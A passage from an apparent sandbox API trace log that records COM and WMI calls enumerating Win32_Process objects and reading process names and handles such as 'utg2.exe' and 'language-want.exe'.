This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.899] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.899] IWbemClassObject:Get (in: This=0x56367a0, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269d37c*=0, plFlavor=0x269d380*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x269d37c*=8, plFlavor=0x269d380*=0) returned 0x0 [0214.899] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0214.899] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0214.899] IWbemClassObject:Get (in: This=0x56367a0, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269d37c*=8, plFlavor=0x269d380*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="utg2.exe", varVal2=0x0), pType=0x269d37c*=8, plFlavor=0x269d380*=0) returned 0x0 [0214.899] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0214.899] SysStringByteLen (bstr="utg2.exe") returned 0x10 [0214.899] CoTaskMemAlloc (cb=0x4) returned 0x5632428 [0214.899] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632428, puReturned=0x267acc0 | out: apObjects=0x5632428*=0x5636938, puReturned=0x267acc0*=0x1) returned 0x0 [0214.901] IUnknown:QueryInterface (in: This=0x5636938, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636938) returned 0x0 [0214.901] IUnknown:QueryInterface (in: This=0x5636938, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.901] IUnknown:QueryInterface (in: This=0x5636938, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.902] IUnknown:AddRef (This=0x5636938) returned 0x3 [0214.902] IUnknown:QueryInterface (in: This=0x5636938, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.902] IUnknown:QueryInterface (in: This=0x5636938, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.902] IUnknown:QueryInterface (in: This=0x5636938, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x563693c) returned 0x0 [0214.902] IMarshal:GetUnmarshalClass (in: This=0x563693c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.902] IUnknown:Release (This=0x563693c) returned 0x3 [0214.902] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.902] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.902] IUnknown:QueryInterface (in: This=0x5636938, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.902] IUnknown:Release (This=0x5636938) returned 0x2 [0214.902] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.902] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.902] IUnknown:QueryInterface (in: This=0x5636938, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636938) returned 0x0 [0214.902] IUnknown:AddRef (This=0x5636938) returned 0x4 [0214.902] IUnknown:Release (This=0x5636938) returned 0x3 [0214.902] IUnknown:Release (This=0x5636938) returned 0x2 [0214.902] CoTaskMemFree (pv=0x5632428) [0214.902] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.902] IUnknown:AddRef (This=0x5636938) returned 0x3 [0214.903] IWbemClassObject:Get (in: This=0x5636938, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.903] IWbemClassObject:Get (in: This=0x5636938, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2752\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.903] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2752\"") returned 0x66 [0214.903] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2752\"") returned 0x66 [0214.903] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.903] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.903] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.903] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.904] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632428) returned 0x0 [0214.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632428, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.904] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632428, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5638600) returned 0x0 [0214.904] WbemDefPath:IUnknown:Release (This=0x5632428) returned 0x0 [0214.904] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5638600) returned 0x0 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.905] WbemDefPath:IUnknown:AddRef (This=0x5638600) returned 0x3 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632438) returned 0x0 [0214.905] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632438, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.905] WbemDefPath:IUnknown:Release (This=0x5632438) returned 0x3 [0214.905] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.905] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.905] WbemDefPath:IUnknown:Release (This=0x5638600) returned 0x2 [0214.905] WbemDefPath:IUnknown:Release (This=0x5638600) returned 0x1 [0214.905] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.905] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.905] WbemDefPath:IUnknown:QueryInterface (in: This=0x5638600, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5638600) returned 0x0 [0214.905] WbemDefPath:IUnknown:AddRef (This=0x5638600) returned 0x3 [0214.905] WbemDefPath:IUnknown:Release (This=0x5638600) returned 0x2 [0214.905] WbemDefPath:IWbemPath:SetText (This=0x5638600, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2752\"") returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.906] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.906] IWbemClassObject:Get (in: This=0x5636938, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269dbe0*=0, plFlavor=0x269dbe4*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="language-want.exe", varVal2=0x0), pType=0x269dbe0*=8, plFlavor=0x269dbe4*=0) returned 0x0 [0214.906] SysStringByteLen (bstr="language-want.exe") returned 0x22 [0214.906] SysStringByteLen (bstr="language-want.exe") returned 0x22 [0214.906] IWbemClassObject:Get (in: This=0x5636938, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x269dbe0*=8, plFlavor=0x269dbe4*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="language-want.exe", varVal2=0x0), pType=0x269dbe0*=8, plFlavor=0x269dbe4*=0) returned 0x0 [0214.906] SysStringByteLen (bstr="language-want.exe") returned 0x22 [0214.906] SysStringByteLen (bstr="language-want.exe") returned 0x22 [0214.906] CoTaskMemAlloc (cb=0x4) returned 0x5632468 [0214.906] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5632468, puReturned=0x267acc0 | out: apObjects=0x5632468*=0x5636ad0, puReturned=0x267acc0*=0x1) returned 0x0 [0214.907] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x5636ad0) returned 0x0 [0214.907] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.907] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.908] IUnknown:AddRef (This=0x5636ad0) returned 0x3 [0214.908] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.908] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.908] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x5636ad4) returned 0x0 [0214.908] IMarshal:GetUnmarshalClass (in: This=0x5636ad4, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.908] IUnknown:Release (This=0x5636ad4) returned 0x3 [0214.908] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.908] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.908] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.908] IUnknown:Release (This=0x5636ad0) returned 0x2 [0214.908] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.908] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.908] IUnknown:QueryInterface (in: This=0x5636ad0, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x5636ad0) returned 0x0 [0214.908] IUnknown:AddRef (This=0x5636ad0) returned 0x4 [0214.908] IUnknown:Release (This=0x5636ad0) returned 0x3 [0214.908] IUnknown:Release (This=0x5636ad0) returned 0x2 [0214.908] CoTaskMemFree (pv=0x5632468) [0214.909] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.909] IUnknown:AddRef (This=0x5636ad0) returned 0x3 [0214.909] IWbemClassObject:Get (in: This=0x5636ad0, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.909] IWbemClassObject:Get (in: This=0x5636ad0, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.909] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x66 [0214.909] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2804\"") returned 0x66 [0214.909] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.909] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.909] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.909] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.910] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x5632468) returned 0x0 [0214.910] WbemDefPath:IUnknown:QueryInterface (in: This=0x5632468, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.910] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5632468, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x56386e0) returned 0x0 [0214.910] WbemDefPath:IUnknown:Release (This=0x5632468) returned 0x0 [0214.910] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x56386e0) returned 0x0 [0214.910] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.911] WbemDefPath:IUnknown:AddRef (This=0x56386e0) returned 0x3 [0214.911] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.911] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.911] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x5632478) returned 0x0 [0214.911] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5632478, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.911] WbemDefPath:IUnknown:Release (This=0x5632478) returned 0x3 [0214.911] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.911] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.911] WbemDefPath:IUnknown:QueryInterface (in: This=0x56386e0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.911] WbemDefPath:IUnknown:Release (This=0x56386e0) returned 0x2 [0214.911] WbemDefPath:IUnknown:Release (This=0x56386e0) returned 0x1 [0214.911] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.911] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.911] WbemDefPath:IUnknown:QueryInterface (in: 